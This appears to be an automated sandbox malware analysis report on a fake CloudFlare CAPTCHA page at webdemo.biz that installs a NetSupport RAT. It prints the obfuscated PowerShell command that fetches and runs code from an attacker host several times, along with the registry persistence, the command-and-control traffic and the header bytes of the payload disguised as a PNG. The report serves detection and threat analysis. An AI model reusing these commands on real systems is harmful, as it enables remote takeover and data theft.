Edit tour

Windows Analysis Report
https://webdemo.biz/

Overview

General Information

Sample URL:	https://webdemo.biz/
Analysis ID:	1545769
Infos:

Detection

NetSupport RAT, CAPTCHA Scam

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Detect drive by download via clipboard copy & paste

Sigma detected: Powershell drops NetSupport RAT client

Suricata IDS alerts for network traffic

Yara detected CAPTCHA Scam

Downloads files with wrong headers with respect to MIME Content-Type

Powershell drops PE file

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Uses ipconfig to lookup or modify the Windows network settings

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Downloads executable code via HTTP

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webdemo.biz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

mshta.exe (PID: 7940 cmdline: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 1284 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

attrib.exe (PID: 5940 cmdline: attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

client32.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 19 entries

Memory Dumps

Source	Rule	Description	Author
00000013.00000000.1798242317.000000000075F000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000000.1798242317.0000000000752000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000002.2445421109.000000006C620000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000002.2432544549.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000002.2427181578.0000000000752000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000002.2441539518.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000013.00000002.2440967241.0000000011193000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000002.2440967241.0000000011193000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 3 entries

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2848, ProcessName: svchost.exe

Remote Access Functionality

Sigma detected: Powershell drops NetSupport RAT client

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\NSM.LIC

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T00:15:42.254947+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:42.254947+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:42.254947+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:43.896654+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:43.896654+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:43.896654+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:45.856988+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:45.856988+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:45.856988+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.019053+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.019053+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.019053+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.243368+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.243368+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.243368+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.411456+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.411456+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.411456+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.663800+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.663800+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.663800+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.866278+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.866278+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:46.866278+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:52.195934+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:52.195934+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:52.195934+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49737	166.1.160.211	80	TCP
2024-10-31T00:15:53.167434+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49739	166.1.160.211	80	TCP
2024-10-31T00:15:53.167434+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49739	166.1.160.211	80	TCP
2024-10-31T00:15:53.167434+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49739	166.1.160.211	80	TCP
2024-10-31T00:15:55.980864+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49740	166.1.160.211	80	TCP
2024-10-31T00:15:55.980864+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49740	166.1.160.211	80	TCP
2024-10-31T00:15:55.980864+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49740	166.1.160.211	80	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T00:15:03.265705+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49742	92.255.85.135	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://webdemo.biz/

LLM: Score: 8 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'webdemo.biz' does not match the legitimate domain for CloudFlare., The domain 'webdemo.biz' is generic and does not have any direct association with CloudFlare., The use of a '.biz' domain extension is unusual for a well-known brand like CloudFlare, which typically uses '.com'., The input fields 'u, n, k, n, o, w, n' do not provide any clear context or association with CloudFlare services. DOM: 1.0.pages.csv

Yara detected CAPTCHA Scam

Source: Yara match

File source: 1.0.pages.csv, type: HTML

Source: https://webdemo.biz/

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....

Source: https://webdemo.biz/	HTTP Parser: No favicon
Source: https://webdemo.biz/	HTTP Parser: No favicon

Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe

File opened: C:\Users\user\AppData\Roaming\HzYATQ\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.84.254:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 166.1.160.211:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 27MB later: 38MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49742 -> 92.255.85.135:443

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Image file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 30 Oct 2024 23:15:53 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 23:15:53 GMTContent-Type: image/pngContent-Length: 396664Last-Modified: Mon, 21 Oct 2024 07:35:59 GMTConnection: keep-aliveETag: "6716045f-60d78"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 